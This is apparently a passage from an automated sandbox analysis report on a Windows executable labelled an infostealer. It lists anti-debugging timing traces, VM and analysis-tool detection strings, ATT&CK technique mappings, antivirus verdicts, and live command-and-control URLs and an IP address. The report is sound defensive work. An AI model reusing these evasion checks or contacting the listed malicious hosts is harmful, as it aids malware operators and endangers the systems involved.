Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F61004 second address: 6F610DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDC0050BD4Bh 0x00000009 adc esi, 1F2AB79Eh 0x0000000f jmp 00007FDC0050BD59h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 test eax, eax 0x0000001a pushad 0x0000001b pushad 0x0000001c mov di, cx 0x0000001f pushfd 0x00000020 jmp 00007FDC0050BD56h 0x00000025 jmp 00007FDC0050BD55h 0x0000002a popfd 0x0000002b popad 0x0000002c movzx esi, bx 0x0000002f popad 0x00000030 jne 00007FDC70A8A3B3h 0x00000036 pushad 0x00000037 call 00007FDC0050BD59h 0x0000003c push esi 0x0000003d pop ebx 0x0000003e pop esi 0x0000003f push ebx 0x00000040 mov edi, esi 0x00000042 pop esi 0x00000043 popad 0x00000044 mov edx, dword ptr [ebp+08h] 0x00000047 jmp 00007FDC0050BD4Bh 0x0000004c mov eax, dword ptr [esi] 0x0000004e pushad 0x0000004f pushfd 0x00000050 jmp 00007FDC0050BD4Bh 0x00000055 sbb esi, 733E59CEh 0x0000005b jmp 00007FDC0050BD59h 0x00000060 popfd 0x00000061 popad 0x00000062 mov dword ptr [edx], eax 0x00000064 push eax 0x00000065 push edx 0x00000066 pushad 0x00000067 mov bh, D7h 0x00000069 popad 0x0000006a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F610DD second address: 6F61177 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDC00CE27AEh 0x00000009 sbb eax, 19F59578h 0x0000000f jmp 00007FDC00CE27ABh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FDC00CE27B8h 0x0000001b xor ch, FFFFFFD8h 0x0000001e jmp 00007FDC00CE27ABh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 mov eax, dword ptr [esi+04h] 0x0000002a jmp 00007FDC00CE27B6h 0x0000002f mov dword ptr [edx+04h], eax 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007FDC00CE27ADh 0x0000003b xor eax, 1CF41A26h 0x00000041 jmp 00007FDC00CE27B1h 0x00000046 popfd 0x00000047 mov ecx, 73C43757h 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F61177 second address: 6F6117C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F6117C second address: 6F611D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bx, 95DCh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+08h] 0x0000000e jmp 00007FDC00CE27ABh 0x00000013 mov dword ptr [edx+08h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov ax, bx 0x0000001c pushfd 0x0000001d jmp 00007FDC00CE27B7h 0x00000022 sbb esi, 7CE722BEh 0x00000028 jmp 00007FDC00CE27B9h 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F611D7 second address: 6F61271 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+0Ch] 0x0000000c pushad 0x0000000d mov bx, ax 0x00000010 mov ebx, ecx 0x00000012 popad 0x00000013 mov dword ptr [edx+0Ch], eax 0x00000016 pushad 0x00000017 jmp 00007FDC0050BD50h 0x0000001c pushfd 0x0000001d jmp 00007FDC0050BD52h 0x00000022 add ch, 00000048h 0x00000025 jmp 00007FDC0050BD4Bh 0x0000002a popfd 0x0000002b popad 0x0000002c mov eax, dword ptr [esi+10h] 0x0000002f pushad 0x00000030 movsx edx, cx 0x00000033 popad 0x00000034 mov dword ptr [edx+10h], eax 0x00000037 jmp 00007FDC0050BD4Ah 0x0000003c mov eax, dword ptr [esi+14h] 0x0000003f jmp 00007FDC0050BD50h 0x00000044 mov dword ptr [edx+14h], eax 0x00000047 jmp 00007FDC0050BD50h 0x0000004c mov eax, dword ptr [esi+18h] 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F61271 second address: 6F61275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F61275 second address: 6F6127B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F6127B second address: 6F612BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDC00CE27B2h 0x00000009 sbb si, B468h 0x0000000e jmp 00007FDC00CE27ABh 0x00000013 popfd 0x00000014 movzx ecx, di 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [edx+18h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FDC00CE27AEh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F612BB second address: 6F612C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F612C2 second address: 6F612F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esi+1Ch] 0x0000000a jmp 00007FDC00CE27B9h 0x0000000f mov dword ptr [edx+1Ch], eax 0x00000012 pushad 0x00000013 mov si, 88C3h 0x00000017 push eax 0x00000018 push edx 0x00000019 mov edi, eax 0x0000001b rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F612F1 second address: 6F61300 instructions: 0x00000000 rdtsc 0x00000002 mov ah, 41h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esi+20h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F61300 second address: 6F61307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov al, FBh 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F61307 second address: 6F6130D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F6130D second address: 6F61311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F61311 second address: 6F61315 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F61315 second address: 6F61396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+20h], eax 0x0000000b jmp 00007FDC00CE27B4h 0x00000010 mov eax, dword ptr [esi+24h] 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FDC00CE27AEh 0x0000001a adc cl, 00000018h 0x0000001d jmp 00007FDC00CE27ABh 0x00000022 popfd 0x00000023 mov cx, 70CFh 0x00000027 popad 0x00000028 mov dword ptr [edx+24h], eax 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FDC00CE27B0h 0x00000032 sub si, BB78h 0x00000037 jmp 00007FDC00CE27ABh 0x0000003c popfd 0x0000003d push eax 0x0000003e movsx ebx, ax 0x00000041 pop ecx 0x00000042 popad 0x00000043 mov eax, dword ptr [esi+28h] 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007FDC00CE27AAh 0x0000004d rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F61396 second address: 6F613F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, F784h 0x00000007 push edi 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [edx+28h], eax 0x0000000f pushad 0x00000010 mov cx, dx 0x00000013 pushfd 0x00000014 jmp 00007FDC0050BD51h 0x00000019 or esi, 64227D76h 0x0000001f jmp 00007FDC0050BD51h 0x00000024 popfd 0x00000025 popad 0x00000026 mov ecx, dword ptr [esi+2Ch] 0x00000029 pushad 0x0000002a mov dh, 1Dh 0x0000002c popad 0x0000002d mov dword ptr [edx+2Ch], ecx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FDC0050BD51h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F613F1 second address: 6F613F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F613F7 second address: 6F613FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F613FB second address: 6F61421 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ax, word ptr [esi+30h] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov cx, bx 0x00000015 push edx 0x00000016 pop ecx 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F61421 second address: 6F61447 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+30h], ax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F61447 second address: 6F6144B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F6144B second address: 6F61451 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F61451 second address: 6F61457 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F61573 second address: 6F61578 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F61578 second address: 6F6159C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx ebx, si 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDC00CE27B7h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F6159C second address: 6F615A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, B0h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F615A3 second address: 6F615E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebx 0x00000008 jmp 00007FDC00CE27ACh 0x0000000d leave 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 movsx ebx, si 0x00000014 pushfd 0x00000015 jmp 00007FDC00CE27B6h 0x0000001a add cx, E178h 0x0000001f jmp 00007FDC00CE27ABh 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F615E7 second address: 6F615FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDC0050BD54h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6FB0DCE second address: 6FB0DE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDC00CE27AEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6FB0DE0 second address: 6FB0DE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F5088A second address: 6F50892 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F50892 second address: 6F508B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 jmp 00007FDC0050BD54h 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F508B6 second address: 6F508BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeSpecial instruction interceptor: First address: 8D9923 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\joE9s9sbv0.exeSpecial instruction interceptor: First address: 8D9A12 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\joE9s9sbv0.exeSpecial instruction interceptor: First address: A81DEA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\joE9s9sbv0.exeSpecial instruction interceptor: First address: B10F51 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: 0_2_001D255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_001D255D
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: 0_2_001D29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_001D29FF
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: 0_2_001D255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_001D255D
Source: joE9s9sbv0.exe, joE9s9sbv0.exe, 00000000.00000002.1684161804.0000000000A64000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: joE9s9sbv0.exeBinary or memory string: Hyper-V RAW
Source: joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: joE9s9sbv0.exe, 00000000.00000002.1684161804.0000000000A64000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: joE9s9sbv0.exe, 00000000.00000003.1653214748.00000000014CD000.00000004.00000020.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000003.1653452383.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000003.1653322641.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1685319789.00000000014DE000.00000004.00000020.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000003.1653681203.00000000014DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"index": 2 }, { "app_name": "Microsoft Edge WebView2 Runtime", "index": 3 }, { "app_name": "Java Auto Updater", "index": 4 }, { "app_name": "Java 8 Update 381", "index": 5 }, { "app_name": "Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532", "index": 6 }, { "app_name": "Office 16 Click-to-Run Extensibility Component", "index": 7 }, { "app_name": "Google Chrome", "index": 8 }, { "app_name": "Microsoft Edge", "index": 9 }, { "app_name":
Source: joE9s9sbv0.exe, 00000000.00000003.1565528772.0000000001472000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!!
Source: C:\Users\user\Desktop\joE9s9sbv0.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\joE9s9sbv0.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\joE9s9sbv0.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\joE9s9sbv0.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\joE9s9sbv0.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\joE9s9sbv0.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\joE9s9sbv0.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\joE9s9sbv0.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\joE9s9sbv0.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\joE9s9sbv0.exeFile opened: NTICE
Source: C:\Users\user\Desktop\joE9s9sbv0.exeFile opened: SICE
Source: C:\Users\user\Desktop\joE9s9sbv0.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\joE9s9sbv0.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeProcess queried: DebugPortJump to behavior
Source: joE9s9sbv0.exe, joE9s9sbv0.exe, 00000000.00000002.1684161804.0000000000A64000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: DProgram Manager
Source: C:\Users\user\Desktop\joE9s9sbv0.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: joE9s9sbv0.exe, 00000000.00000003.1549033971.00000000071F7000.00000004.00001000.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: procmon.exe
Source: joE9s9sbv0.exe, 00000000.00000003.1549033971.00000000071F7000.00000004.00001000.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Source: global trafficTCP traffic: 192.168.2.10:49705 -> 176.53.146.223:80
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter
1
DLL Side-Loading
1
Process Injection
23
Virtualization/Sandbox Evasion
OS Credential Dumping741
Security Software Discovery
1
Exploitation of Remote Services
11
Archive Collected Data
11
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Process Injection
LSASS Memory23
Virtualization/Sandbox Evasion
Remote Desktop Protocol1
Data from Local System
4
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information
Security Account Manager13
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive4
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
Obfuscated Files or Information
NTDS1
Remote System Discovery
Distributed Component Object ModelInput Capture5
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing
LSA Secrets1
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain Credentials216
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
joE9s9sbv0.exe49%VirustotalBrowse
joE9s9sbv0.exe57%ReversingLabsWin32.Infostealer.Tinba
joE9s9sbv0.exe100%AviraTR/Crypt.TPM.Gen
joE9s9sbv0.exe100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737http://home.fiveth5vs.top/KhxTILlSHLygUudVWl100%Avira URL Cloudmalware
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737?argument=0100%Avira URL Cloudmalware
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17355377376963100%Avira URL Cloudmalware
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17355377374fd4100%Avira URL Cloudmalware
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17100%Avira URL Cloudmalware
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737100%Avira URL Cloudmalware

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
home.fiveth5vs.top
176.53.146.223
truefalse
    high
    httpbin.org
    34.200.57.114
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737?argument=0true
      • Avira URL Cloud: malware
      unknown
      http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737true
      • Avira URL Cloud: malware
      unknown
      https://httpbin.org/ipfalse
        high
        NameSourceMaliciousAntivirus DetectionReputation
        https://curl.se/docs/hsts.htmljoE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpfalse
          high
          http://html4/loose.dtdjoE9s9sbv0.exe, 00000000.00000003.1549033971.00000000071F7000.00000004.00001000.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpfalse
            high
            https://httpbin.org/ipbeforejoE9s9sbv0.exe, 00000000.00000003.1549033971.00000000071F7000.00000004.00001000.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpfalse
              high
              https://curl.se/docs/http-cookies.htmljoE9s9sbv0.exe, joE9s9sbv0.exe, 00000000.00000003.1549033971.00000000071F7000.00000004.00001000.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpfalse
                high
                http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737http://home.fiveth5vs.top/KhxTILlSHLygUudVWljoE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpfalse
                • Avira URL Cloud: malware
                unknown
                https://curl.se/docs/hsts.html#joE9s9sbv0.exefalse
                  high
                  http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17355377376963joE9s9sbv0.exe, 00000000.00000003.1653255123.0000000001472000.00000004.00000020.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1685112528.0000000001475000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17355377374fd4joE9s9sbv0.exe, 00000000.00000003.1653255123.0000000001472000.00000004.00000020.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1685112528.0000000001475000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  https://curl.se/docs/alt-svc.htmljoE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpfalse
                    high
